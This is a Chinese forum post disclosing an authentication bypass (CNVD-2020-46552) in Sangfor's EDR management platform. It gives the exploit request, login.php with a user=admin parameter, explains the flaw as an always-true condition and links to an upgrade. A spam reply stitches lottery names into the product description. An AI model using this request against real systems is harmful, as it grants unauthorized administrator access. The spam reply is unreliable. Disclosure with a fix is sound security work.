0day满天飞之某服终端检测响应平台 - 任意用户登录

辉辉科技论坛管理员   ·   发表于 8个月前   ·   白帽安全

0day满天飞之某服终端检测响应平台 - 任意用户登录

简介

终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。

1、漏洞-此平台存在任意用户登录漏洞

  如何找到某服资产,由于敏感此处省略 ,目前测试影响版本3.2.20以前版本 该漏洞已被CNVD收录,漏洞编号为CNVD-2020-46552。

2、漏洞利用

  资产登录可以利用  https://ip:端口号/ui/login.php?user=任意账号
   例如常用的 https://ip:端口号/ui/login.php?user=admin
   浏览器输入完毕后直接回车登录平台
3、漏洞分析

  存在逻辑错误,条件为永真

4、修复建议

  如当前使用的版本为受影响版本,请按下方链接中的文档进行升级。  
https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/all/undefined

Attachment List

EDR_v3.2.21_用户手册.pdf   File Size:18.562M (Download Count:0)

1 Reply   |  Until 1个月前 | 386 View

mannie
发表于 1个月前

终端检测响应平台(EDR)幸运飞艇

安徽快3
台湾今彩539

新疆时时彩是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content